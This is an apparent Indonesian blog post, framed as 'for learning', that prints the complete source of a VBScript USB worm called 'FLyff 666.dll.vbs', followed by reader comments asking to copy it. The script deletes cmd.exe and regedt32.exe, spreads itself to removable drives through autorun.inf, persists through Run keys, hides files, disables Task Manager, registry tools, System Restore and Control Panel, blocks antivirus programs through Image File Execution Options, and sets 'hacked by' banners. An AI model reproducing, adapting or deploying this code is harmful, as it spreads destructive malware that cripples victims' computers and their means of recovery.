Semoga berguna buat pelajaran...
FLyff 666.dll.vbs
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=WScript.exe FLyff 666.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
Fs.DeleteFile("C:/Windows/System32/regedt32.exe")
Fs.DeleteFile("C:/Windows/System32/cmd.exe")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
Loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\Flyff 666.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\Flyff 666.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\Flyff 666.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\Flyff 666.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\Flyff 666.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\Flyff 666.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\User",winpath&"\Flyff 666.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Flyff 666"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\Hidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\HideFileExt", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\ShowSuperHidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\SuperHidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\CleanShutdown", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\FaultTime", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoFind", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoFolderOptions", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoRun", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoCDBurning", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoViewContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoTrayContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoWinKeys", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoDesktop", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoTrayContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\Shutdown_Settings", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\System", "1", "REG_DWORD"
rg.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoDrives", "67108863", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
System\DisableCMD", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
System\DisableRegistryTools", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
System\DisableTaskMgr", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
System\NoScrSavPage", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
System\NoDispCpl", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\
Program Manager\Restrictions\NoClose", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\
Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\
Program Manager\Restrictions\NoRun", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoLogOff", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoControlPanel", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoFolderOptions", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
System\DisableRegistryTools", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
System\DisableTaskMgr", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run\System Monitoring", "1", "REG_DWORD"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\
LegalNoticeCaption", "Flyff 666 VM_Community"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\
LegalNoticeText", "Saya Adalah Program Jahat yang Mengambil Alih Komputer kalian !! dibuat Oleh Flyff 666"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\cmd.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\install.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\regedit.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\setup.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\avscan.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\avcenter.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\ansav.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\viremover.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\nod32.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger",""
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
System\LegalNoticeCaption", "H4x0r3d By Flyff 666"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\LegalNoticeText", "Saya Adalah Program Jahat yang Akan Mengambil Alih Komputer kalian !! System Hasbeen Hacked BY : Flyff 666 From Indonesian Hackers Community"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\
LimitSystemRestoreCheckpointing", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\
DisableMSI", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"
if check <> 1 then
WScript.sleep 100000
end if
loop while check<>1
set sd = createobject("WScript.shell")
sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname
3 komentar:
oh nooooooo.....izin copast buat belajar!! thanks for share friends
ijin neh mas,, Di Gandeng dulu..
cara ilangin lagi nya gmn
Poskan Komentar